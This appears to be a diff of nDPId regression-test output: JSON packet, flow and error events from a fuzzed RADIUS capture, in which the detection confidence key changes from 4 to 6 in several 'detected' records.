01284{"packet_event_id":1,"packet_event_name":"packet","packet_id":298,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528998308061,"pkt":"AAAMB6xAABRP+4rqCAAkAALbIVBAAP8RAAAKDEAexuIZNXIQBxQCxwAAAaACv\/i0glgkXqR4abyMOyu1FuUaCgAAV8gOBFVTGgwAAFfIDSUAaWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqmkATUwMzExNDgwNDMyNjA4NTg2QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TNWMtMWQtZDktNTMtMGMtOWIeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpLi1zZXNzaW9uLWl0PTEwZmYxMGFjMDAwMDAwZDFhNGE5MjI1YiwgNWIyMmE5YTQvNWM6MWQ6ZDE6NTM6MGM6OWIvMjQwBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABFABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODA0MzJoMDg1ODbWd2xhbi5tbkM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhdWQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZCUAbURpcmVjdBoMAAAFgwdbwFBKmVAS3DaqxzVlY8YVdJMYTWA\/Jw=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1528998314309,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998314309,"pkt":"ABRP+4pIcNuYVcUnCABFAAClDKJAAPwRR2TG4hk1ClFAHgcUchAAkVZiC6QAiXXtUkUY2UEpsUhCUrecX98BNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5YTQvNWM6MWQ6ZDk6NTM6MGM6OWIvMjQwTw4BAAAMFwwAAAwBf\/xQEi8FyNCyWjoJnDm8uRInVVc="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998314512,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1528998314512,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528998314512,"pkt":"ABRP+4rqcNuYVcUnCABFAADADKZAAPwRR0XG4hk1CgxAHqgUchAArLr7A6UApAJ1Pjz8JGCwuo5GIgtQcZwBNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm5yZywgNWIyMmE5YTQvNWM6MWQ6ZDk6QjM6MGM6OWIvMjQwEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92a3Npa25lZE8HBAEABwBQEil3cnDy8\/cVSnBQY7FdIyI="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":312,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528998315379} @@ -395,7 +395,7 @@ 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":318,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528998323340,"pkt":"AAAMB6xAABRP+4rqCABFAALbIVpEAP8RAAAKDEAexuIZNXIQBxQCxwAAAaoCv2Uj1+ujspK2VyIvdisE+iUaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1528998338382,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998338382,"pkt":"ABQlAIrqcNuYVcUnCABFAADhDOxAAPwRRt7G4hk1CgxASQcUchAAzQ2+C6oAxV4x6AhgYl+1t\/7aBLDTkJgBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Y6MzcvMjM3T0oBAgBIFwEAAAEFAAD9ndZ8FHhsyj5jhEswY1t0AgUAABpKKGv5SQAALFBpvDseP8KLAQACCwUAAC1HLAQoI0jpYeW4fPFsl+tQEgCJjyegSbpAOXlBuPG4l8E="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":321,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528998338865} 00713{"packet_event_id":1,"packet_event_name":"packet","packet_id":321,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998338669,"pkt":"ABRP+4rq8NuYVcUnCABFAAEwDPCkAPwRRos14hk1CgxAHgcUchABHImMAqsBFPNe2aGl6LP5y1u\/scR1o3AaCwAAV8gbBVNQOBpuAAABNxA0yJ0HwRo2kUg5GkMLWv3LIW9bZ\/+pjZx0CoGr7LPlqjfgOPOLXgeADm9RiTIaXTD+uAsRNK2vP2ZsGXahxC9sjBUhoGJOMJlzjqJyAyTjvpVvse28Qg5S9JgwmD8p+ZaQYnYBaM5xATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0JQByay5vcmcsIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBIrffGqrk1JHmvfqoB\/bRcD"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":322,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528998342492} @@ -404,42 +404,42 @@ 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":324,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528998342683,"pkt":"AAAMB6xAABRP+4rqCABFACUAIV1AAP8RAAAKDEAexuIZNXIQBxQCswAAAa0Cqyd5am7x7at665a6XdQ818IaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADhEDQM0NwZbIqnGATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZiAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkSzEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3BAasFGYQIA5WSldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAIAsFAACkCLiSdrciiCUA2Lhjf5WeAwIAIFh8yjsaFAAAV8gHDlZaV0My1GVzdExhYhoKAABXyAgERSUAEEYAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1528998346991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998346991,"pkt":"ABRP+4rqcNuTVcUnCABFAADhDRdAAPwRRrPG4hk1CgxAHgcUchgAzQnPC64AxTy6++0fAX35UVXUpCEgeNcBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjAlADk6QTA6ZCUAN2Q6MzcvMjM3T0oBAgBIFwEAAAEFAAB+LhDHIi3oCVbmy0rSchdaAgUAAJdIOUyErgAA73piWKcgvT+LAQACCwUAAEZfsVUxfYxGJMfW\/6iCQHdQEgwvQS2NfxbBCfFadP4Rx2E="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1528998347284,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998347284,"pkt":"AAAMB6xAABRP+4rqCABFAALHIV9AAP8RAAAKDEAexuIZNXJpBxQCswAAAa8Cq915o4ky+NTjcjv0F1wXmegaCgAAV8gOBFVTGgwAADHIDQZ3aWZpGg8AAFfICRlXSVNQUjEwGgkAADghDQM0NwZbIqnLATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDEjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQw72UwLTAwOlYlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjaTAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NSUAZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3UwasFAEQIA5WWldDMlRlc3SHYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAAA+8R0Z7LSWHOP9VffmhYCuAwIAIG5bieAaFAAAV8gHDlZaV0MyVGVzdExhahoKAABXyAgERVQaEAAA+8gKClN0YW5kYXJkGhAAAFfICwhUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkpiEQAAV8gRC055bmRodXJzdBoMACU4yKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":329,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528998347461} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":329,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998347284,"pkt":"ABRP+4rqcNuYVcUnqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1528998372930,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998372930,"pkt":"AAAMB6xAABRP+4rqCABFAALbIWBAAP8RAAAKDEAexuIZFXIQBxQCxwAAAbACvzQe93K2s3Upjyh7NVxn+MAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqnkATUwMzExNDgwMjMyNTY4NjMxkHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGggAAAR8TOTAtYjAtZWQtNGUtNzctYTMeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDDyMDAw\/jJtNGE5MjI1YiwgNWIyMmE5ZTQvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAQAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzcCAQA4ATAzMTE0ODAyMzI1Njg2MzFAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAclAFpXQzJUZXN0TGEiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGlAAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWld0QzIgVGVzdCBMYWIaCwAAV8klBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOG4RBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bbJpcmVjdBoMAAAFgwcGwFBKmVASj8JRxOD8ARCA2Tk5GozLCQ=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 